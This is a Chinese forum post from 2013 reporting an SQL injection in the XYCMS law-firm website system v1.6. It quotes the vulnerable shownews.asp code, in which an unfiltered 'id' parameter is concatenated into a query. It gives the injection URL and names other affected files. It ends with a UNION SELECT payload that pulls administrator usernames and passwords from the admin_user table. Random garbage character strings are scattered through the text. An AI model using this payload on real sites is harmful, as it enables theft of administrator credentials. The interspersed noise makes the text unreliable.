前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
& `; d, m. E4 g) F- p 9 ]3 a s, Y+ [, }
淫荡分割线4 u% W7 Z U, O
--------------------------------------------------------% E) d# D, x O. H( z& A* ]" f
: M+ _6 {1 I9 M( D审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)4 j6 D. {- u+ G! G
源码地址:http://down.chinaz.com/soft/29233.htm2 x7 B* w1 h9 l4 q& p* I6 U7 Q
& {2 |3 ]" f9 R' Q6 `漏洞文件:shownews.asp ~9 ~& I7 k" }% u
漏洞代码:7-13行
3 L8 A# C; v: P s; F" d . b5 c3 Z9 c* f# p8 X+ ~, I0 ^, l
- o- H4 E, b4 z! h2 W* H; ?$ A
<% 0 s- e/ |2 m4 h3 o/ y3 |
id=request.QueryString("id")
# W, g/ ^8 O6 t+ J, D
1 J- t+ {# s" s. ~# @7 Q0 q, Vset snews=server.createobject("adodb.recordset")
) G! q$ E# c6 Cexec="select * from [news] where id="&id$ C1 c0 {1 N" X5 v- u/ v8 D
snews.open exec,conn,1,1
5 w' ?! |2 R. K. P%>
6 d* N0 S2 p* @2 o3 f$ a
5 {% n$ Q! h/ M' P c # K- e4 O# X. m- ?2 u+ D1 r' ?! }
什么过滤都没有 直造成注入
. ?4 U& e# v- {* r, v# N 2 S, ^$ `, x) u# |* V! W3 d7 A
注入点:http://127.0.0.1:99/shownews.asp?id=xx
5 l( w: }3 y0 P& B$ Y2 r* z 4 X& A* H5 q; \* M7 J2 E$ P' p
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
' i" d3 c. L: |! S& V
. g* g ~: Q" Y8 s. t 0 B0 ~0 h& h: I
exp: union select 1,admin,password,4,5,7 from admin_user
' z& Y% W* n/ o9 I! U0 G; D( t6 E' F7 e7 q0 b$ \$ Y6 X3 v
|
发表于 2013-4-4 17:28:12
收藏
支持
反对